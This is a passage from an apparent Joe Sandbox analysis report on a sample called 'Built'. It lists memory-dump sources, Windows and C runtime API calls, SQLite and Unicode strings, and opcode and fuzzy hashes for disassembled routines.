                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                      • Instruction ID: c537f151fe50e26751e0ceb0704c424d7e94f75f6d8fd4fdb3a1ec125b076e33
                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                      • Instruction Fuzzy Hash: 6011BF32E7CA13C2F6583528D45637989406FEC364FD50634ED7E06ED7AE2DA8409132
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA6BF
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA6DE
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA706
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA717
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA728
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 67d7c9a4660121c24c4849512b9cbc25590cd10ead7cd9dc77a6027d31c3e6e3
                                                                      • Instruction ID: e3a23c33b4fa1eb9fd91c5ef346cb7a13ea3ab6ee5d1027c0814d02c4e948de1
                                                                      • Opcode Fuzzy Hash: 67d7c9a4660121c24c4849512b9cbc25590cd10ead7cd9dc77a6027d31c3e6e3
                                                                      • Instruction Fuzzy Hash: A5113020E2C642C1FA547325556197AE1515FA83E0FC84334EC7E46EDBFE2CB4418B39
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 581e4780875054967335282bc59389d1b6b850a269c2162d209fd03ec5aafdf4
                                                                      • Instruction ID: 88cfe3cb0151cc5226be51c48b3f9b27207ac513443e6026b74b00aedbaccd97
                                                                      • Opcode Fuzzy Hash: 581e4780875054967335282bc59389d1b6b850a269c2162d209fd03ec5aafdf4
                                                                      • Instruction Fuzzy Hash: 0F11E820A2D207C2FE68B22654719BAE2814F69370FD84734DD3E4AED7FD2CB4414A39
                                                                      APIs
                                                                      Strings
                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDF75F1ACE
                                                                      • unknown column "%s" in foreign key definition, xrefs: 00007FFDF75F1DBC
                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00007FFDF75F1AA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007E133019
                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                      • API String ID: 3999650332-272990098
                                                                      • Opcode ID: 0c9dc8279bee1181d8d29c93b14d18195fbcb291ef12baac73ce28fec31f4b54
                                                                      • Instruction ID: 3c706fbe76849bd25fc8e48f05ecf7d7fee76ac00501b20c90e74af837ed7756
                                                                      • Opcode Fuzzy Hash: 0c9dc8279bee1181d8d29c93b14d18195fbcb291ef12baac73ce28fec31f4b54
                                                                      • Instruction Fuzzy Hash: 08D1BE6AB09AC282EF668B15A064BFA7BA1EB45BD4F444135DE6D07BC9DF3CD441C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: verbose
                                                                      • API String ID: 3215553584-579935070
                                                                      • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                      • Instruction ID: 58d4a0c45c034535798c90c5705db5d4201cef23c357bde8c4b553dc42533d2b
                                                                      • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                      • Instruction Fuzzy Hash: B491E032A2CA46C1F721AE25D46037DB291EB02B95FC84136DE6D46BD6FE3CE4058339
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                      • API String ID: 3215553584-1196891531
                                                                      • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                      • Instruction ID: 00f3fb61398ae157db352b101cb9edf821928cd36e35494b1debe1730105adbc
                                                                      • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                      • Instruction Fuzzy Hash: 5881C732E2D283C5F764BF25C130278B6A0AB11749FD58035CE6A97A87FB2DE4419739
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060889895.00007FFDF7031000.00000040.00000001.01000000.0000001E.sdmp, Offset: 00007FFDF7030000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060849267.00007FFDF7030000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7092000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF70DE000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF70E1000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF70E6000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7140000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7143000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7145000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7148000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2061824511.00007FFDF7149000.00000080.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2061898819.00007FFDF714B000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7030000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007B6570
                                                                      • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                      • API String ID: 4069847057-87138338
                                                                      • Opcode ID: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
                                                                      • Instruction ID: c52526db76278fa2b674ace5b557a4b879296b6205354c4a0a6f9872487de3d5
                                                                      • Opcode Fuzzy Hash: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
                                                                      • Instruction Fuzzy Hash: 07610836B1864346E7B08A15A820AFA7272FF90790F448235EA6DC77DDDE7CD4859700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2395640692-1018135373
                                                                      • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                      • Instruction ID: 077da19fe4a2d0217033103bb0f44f8a20e6de25ef0e4e5635f16acedf8bcbba
                                                                      • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                      • Instruction Fuzzy Hash: 5D51C432B2D642CADB14EB15E804678B791EB54B88F948139DE4D47B86FF7CE851CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                      • Instruction ID: e5620f61929949cceb766e7b98cc03726e2ecfd5afd69685a473950756f74a51
                                                                      • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                      • Instruction Fuzzy Hash: E8519132A2C282C6EB74AA119045268B6D0EB54B84F94513ADE5D83FD6EF7CE491CF31
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                      • Instruction ID: b46da84da2d0290710e07bead2f149b0ac091433b39eabe9268ce78014536982
                                                                      • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                      • Instruction Fuzzy Hash: A1615D3291CB85C1D621AB15E4417AAF7A0FB85B94F444239EF9D43B96EF7CE190CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007E133019
                                                                      • String ID: %s at line %d of [%.10s]$database corruption$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24
                                                                      • API String ID: 3999650332-2551159147
                                                                      • Opcode ID: a1985318e20d147dbd9937e0d4865b6ba0f6305ea9cdcc40bed6de76dd9773fa
                                                                      • Instruction ID: 914c09d97fecd71fc769238b4bf3717a19769942306c9eb33633c467f4ab5fdb
                                                                      • Opcode Fuzzy Hash: a1985318e20d147dbd9937e0d4865b6ba0f6305ea9cdcc40bed6de76dd9773fa
                                                                      • Instruction Fuzzy Hash: 50518026B08B4296FB56CB25D550AEA73A4FB48B94F144036DF6D4B7D8EF38E465C300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                      • String ID: .$:$[oV116
                                                                      • API String ID: 2020911589-4261384154
                                                                      • Opcode ID: 907cfb8e6e061aeb6699f1114007dd8f0cf378e4e03f2c0bfd14e443b1b7067f
                                                                      • Instruction ID: c19752f57cbe9ee79995c92747ce3ed21da583478f41830398c3fbd6db95ee55
                                                                      • Opcode Fuzzy Hash: 907cfb8e6e061aeb6699f1114007dd8f0cf378e4e03f2c0bfd14e443b1b7067f
                                                                      • Instruction Fuzzy Hash: 97414F22F2C792D8FB10AFB198611BC66B4AF14758F940035DE6D67E4AFF3894428338
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U$[oV116
                                                                      • API String ID: 442123175-3241692563
                                                                      • Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                      • Instruction ID: 8949226114a8259f1576299f90932b75b5676a27dc11c1518bacbfa968f0e0db
                                                                      • Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                      • Instruction Fuzzy Hash: 7F41B122A2CA85C2DB20EF25E4543B9A761FB98794F844035EE4D87B99EF3CD441CB24
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory
                                                                      • String ID: :$[oV116
                                                                      • API String ID: 1611563598-4125022217
                                                                      • Opcode ID: 4406e5919126d02ea3a76b6133a572177de49089f209fdac8df3cc0ad0528a12
                                                                      • Instruction ID: 8ca1a9c80e806dcee256bb8820287405bc43a9e0667ecde9db04dcbb594a0856
                                                                      • Opcode Fuzzy Hash: 4406e5919126d02ea3a76b6133a572177de49089f209fdac8df3cc0ad0528a12
                                                                      • Instruction Fuzzy Hash: 1B21C122A2C681C1EB60BF15D46427DE3A1FB88B44FC54035DE9C83A86EF7CE9458B75
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesErrorFileLast_invalid_parameter_noinfo
                                                                      • String ID: [oV116
                                                                      • API String ID: 1462441492-247592185
                                                                      • Opcode ID: 4234482ab77b2e09b945cc3cdd470f017e1b5ac919b6b928956638cfc4e69123
                                                                      • Instruction ID: 9150154de874e5a4a9df1f8759a1933a0da8078b101b4f849fd97761fc662beb
                                                                      • Opcode Fuzzy Hash: 4234482ab77b2e09b945cc3cdd470f017e1b5ac919b6b928956638cfc4e69123
                                                                      • Instruction Fuzzy Hash: D2115B21A2C28AC2FB617F699461379A290AF9C744FC00131DE9D93AC3FF7CA4408634
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
                                                                      • String ID: [oV116
                                                                      • API String ID: 838830666-247592185
                                                                      • Opcode ID: 61b5c28cf5bd54c0d1955ea908dddf651f529a3252d172ecfc0f9d2d94de35d5
                                                                      • Instruction ID: 00dd7116cfe842481b09f830a02937769c925462c31f1b0954c2153e75ef1365
                                                                      • Opcode Fuzzy Hash: 61b5c28cf5bd54c0d1955ea908dddf651f529a3252d172ecfc0f9d2d94de35d5
                                                                      • Instruction Fuzzy Hash: B121C534A2CB02C1EB50BB14F951375A665FB98385FD40139DD8E87BA2FF7DA4448B20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                      • String ID: :$[oV116
                                                                      • API String ID: 2595371189-4125022217
                                                                      • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                      • Instruction ID: 2ca4c2416d58bd2da2ab7b83c69facbe00a37a498a66a248d97292ae586a73ec
                                                                      • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                      • Instruction Fuzzy Hash: E401212192C246C6FB20BF64A47127EA2A0EF98748FC41035DD5D86A92FE7CD544CA39
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
